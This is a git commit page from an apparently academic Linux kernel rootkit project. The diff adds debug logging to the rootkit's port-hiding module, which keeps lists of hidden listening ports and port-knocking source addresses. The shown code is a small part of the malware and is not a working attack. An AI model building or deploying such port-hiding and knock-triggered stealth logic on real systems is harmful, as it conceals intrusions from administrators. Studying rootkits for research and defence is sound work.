linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit dbb75ac6b15a47940b8f1025c7e506489441c999
parent c948ab5e7ca06e905f2b359b8e184bfc2a62e1f9
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 17:46:05 +0100

adds debug info

Diffstat:

Msrc/porthide.c | 15++++++++++++++-


1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -55,13 +55,16 @@ lport_list_t_ptr hidden_lports_tail = &hidden_lports;
 void
 hide_lport(lport_t lport)
 {
-    if (!list_contains_lport(&hidden_lports, lport))
+    if (!list_contains_lport(&hidden_lports, lport)) {
+        DEBUG_INFO("hiding lport %d\n", lport);
         add_lport_to_list(hidden_lports_tail, lport);
+    }
 }
 
 void
 unhide_lport(lport_t lport)
 {
+    DEBUG_INFO("unhiding lport %d\n", lport);
     remove_lport_from_list(hidden_lports_tail, lport);
 }
 
@@ -101,6 +104,8 @@ clear_hidden_lports(void)
 
     j = hidden_lports_tail;
     while ((j = remove_lport_from_list(j, j->lport)));
+
+    DEBUG_INFO("cleared hidden lports and knocks\n");
 }
 
 bool
@@ -127,6 +132,8 @@ add_lport_to_list(lport_list_t_ptr tail, lport_t lport)
     node = (lport_list_t_ptr)kmalloc(sizeof(lport_list_t), GFP_KERNEL);
 
     if (node) {
+        DEBUG_INFO("adding lport %d to list\n", lport);
+
         node->lport = lport;
         node->next = NULL;
         node->prev = tail;
@@ -144,6 +151,8 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
     lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
 
     if (i && (i->lport != -1)) {
+        DEBUG_INFO("removing lport %d from list\n", lport);
+
         if (i->next)
             i->next->prev = i->prev;
         else
@@ -184,6 +193,8 @@ add_knock_to_list(knock_list_t_ptr *tail, ip_t ip, ip_version version)
     node = (knock_list_t_ptr)kmalloc(sizeof(knock_list_t), GFP_KERNEL);
 
     if (node) {
+        DEBUG_INFO("adding knock to list\n");
+
         memcpy(node->ip, ip, (version == v4 ? 4 : 16));
         node->version = version;
         node->next = NULL;
@@ -202,6 +213,8 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i
     knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL;
 
     if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) {
+        DEBUG_INFO("removing knock from list\n");
+
         if (i->next)
             i->next->prev = i->prev;
         else